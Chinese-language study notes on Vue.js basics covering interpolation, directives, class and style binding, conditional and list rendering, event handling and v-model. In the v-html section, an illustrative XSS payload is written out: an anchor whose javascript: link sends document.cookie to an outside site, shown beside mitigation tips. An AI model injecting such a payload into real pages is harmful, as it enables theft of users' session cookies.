

一. Vue 基础

1. 模板语法

(1) 插值

a. 文本 {{}}

b. 纯HTML

v-html, 防止XSS, csrf (

(1) 前端过滤

(2) 后台转义(< > < >)

(3) 给cookie 加上属性 http

)

```
1 <a href=javascript:location.href='http://www.baidu.com?
  cookie='+document.cookie>click</a>
2 // 删除&nbsp;和 cookie前面的空格
```

c. 表达式

(2) 指令: 是带有 v- 前缀的特殊属性

v-bind

v-if v-show

v-on:click

v-for

(3) 缩写

v-bind:src => :src

v-on:click => @click

2. class 与 style

(1) 绑定HTML Class

-对象语法

-数组语法

(2) 绑定内联样式

-对象语法

-数组语法

//需要将 font-size => fontSize

3. 条件渲染

(1) v-if

- (2)v-else v-else-if
- (3)template v-if ,包装元素template 不会被创建
- (4)v-show

4. 列表渲染

- (1)v-for (特殊 v-for="n in 10")

- a. in
- b. of

- (2)key:

- *跟踪每个节点的身份，从而重用和重新排序现有元素
- *理想的 key 值是每项都有的且唯一的 id。data.id

- (3)数组更新检测

- a. 使用以下方法操作数组，可以检测变动

push() pop() shift() unshift() splice() sort() reverse()

- b. filter(), concat() 和 slice() ,map(),新数组替换旧数组

- c. 不能检测以下变动的数组

vm.items[indexOfItem] = newValue

解决 (1)Vue.set(example1.items, indexOfItem, newValue)

(2)splice

- (4)应用:显示过滤结果

5. 事件处理

- (1)监听事件-直接触发代码

- (2)方法事件处理器-写函数名 handleClick

- (3)内联处理器方法-执行函数表达式 handleClick(\$event) \$event 事件对象

- (4)事件修饰符 <https://cn.vuejs.org/v2/guide/events.html>

- (5)按键修饰符

6. 表单控件绑定/双向数据绑定

v-model

- (1)基本用法

-购物车

(2)修饰符

.lazy :失去焦点同步一次

.number :格式化数字

.trim : 去除首尾空格